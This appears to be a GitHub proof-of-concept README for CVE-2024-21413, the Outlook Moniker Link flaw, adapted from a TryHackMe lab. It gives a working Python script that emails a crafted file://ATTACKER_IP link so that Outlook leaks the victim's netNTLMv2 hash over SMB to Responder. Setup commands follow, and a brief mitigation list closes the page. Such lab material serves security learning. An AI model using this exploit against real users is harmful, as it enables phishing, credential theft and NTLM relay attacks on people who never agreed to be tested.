来源

关联漏洞

介绍

# Email exploit Moniker Link-CVE-2024-21413-Module — Documentation

**Overview:** A practical PoC demonstrating the use of a Moniker Link in an HTML email to trigger an SMB connection from Outlook, allowing capture of a victim's netNTLMv2 hash via Responder. This showcases practical skills in penetration testing, scripting, and network protocol analysis.

---

## Key Skills Demonstrated

* Python scripting for automated email delivery
* Understanding of SMB, NTLMv2, LLMNR, NBT-NS and MDNS protocols
* Responder configuration and monitoring for hash capture
* Troubleshooting Linux network/DNS configuration issues
* Crafting a controlled offensive security scenario in a lab environment

---

## PoC Workflow

1. **Setup SMB listener:** Start Responder on the attack machine to monitor SMB authentication attempts.
2. **Send crafted email:** Use a Python script to deliver an HTML email with a Moniker Link (`file://`) pointing to the attacker's SMB share.
3. **Hash capture:** When the victim clicks the link, Outlook attempts to fetch the file over SMB, and Responder captures the netNTLMv2 hash.

---

## Minimal Exploit Script

```python
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = 'attacker@monikerlink.thm'
receiver = 'victim@monikerlink.thm'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')
```

*Tip:* Replace `ATTACKER_IP` and `mailserver` before running. In the TryHackMe lab, the password is `attacker`.

---

## Running Responder

```bash
responder -I ens5
```

*Replace `ens5` with your network interface name.*

---

## Troubleshooting `/etc/resolv.conf`

Sometimes Responder fails due to broken symlinks in `/etc/resolv.conf`. Fix with:

```bash
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
```

*Skills highlighted:* Linux troubleshooting, DNS configuration, and adapting tools to cloud/VM environments.

---

## Progress Screenshots

1. **Error / Resolv.conf Issue**:`
   ![Error Resolv.conf](Email%20exploit/error%20resolv.conf.PNG)

2. **DNS Fix Applied**: 
   ![DNS Setup Fix](Email%20exploit/dns%20setup%20fix.PNG)

3. **Python Email Script**:
   ![Python Email Script](Email%20exploit/python%20email%20script.PNG)

4. **Exploit Delivery**:
   ![Exploit Delivery](Email%20exploit/exploit%20delivery.PNG)

5. **Victim Inbox**:
   ![Victim Email](Email%20exploit/victime%20email.PNG)

6. **Captured Victim Hash**: 
   ![Captured Victim Hash](Email%20exploit/Victime%20hash.PNG)

---

## Tools & Commands Used

* **Responder**: SMB/LLMNR/NBT-NS/MDNS listener
* **Python3**: PoC email script execution
* **smtplib / email.mime**: Python libraries for crafting and sending emails
* Linux shell commands for DNS troubleshooting

---

## Skills Learned / Portfolio Highlight

* Network attack simulation and exploitation workflow
* Automation of social engineering vector (Moniker Link email)
* Capturing and analyzing netNTLMv2 hashes
* Cross-discipline troubleshooting: Python, networking, Windows & Linux interaction
* Documentation and workflow presentation for technical reviewers

---

## Mitigation & Defensive Notes

* Disable automatic external content in Outlook
* Block outbound SMB to untrusted networks
* Enforce SMB signing and modern authentication policies on Windows clients

---

## Attribution

Adapted from TryHackMe MonikerLink lab and original PoC by CMNatic ([GitHub](https://github.com/cmnatic))

文件快照

 [4.0K]  /data/pocs/48af2c933a2f1be79e5a7a6e0c87a7195e1c7a72
├── [4.0K]  Email exploit
│   ├── [190K]  dns setup fix.PNG
│   ├── [284K]  error resolv.conf.PNG
│   ├── [134K]  exploit delivery.PNG
│   ├── [298K]  python email script.PNG
│   ├── [227K]  victime email.PNG
│   └── [415K]  Victime hash.PNG
└── [3.9K]  README.md

1 directory, 7 files

备注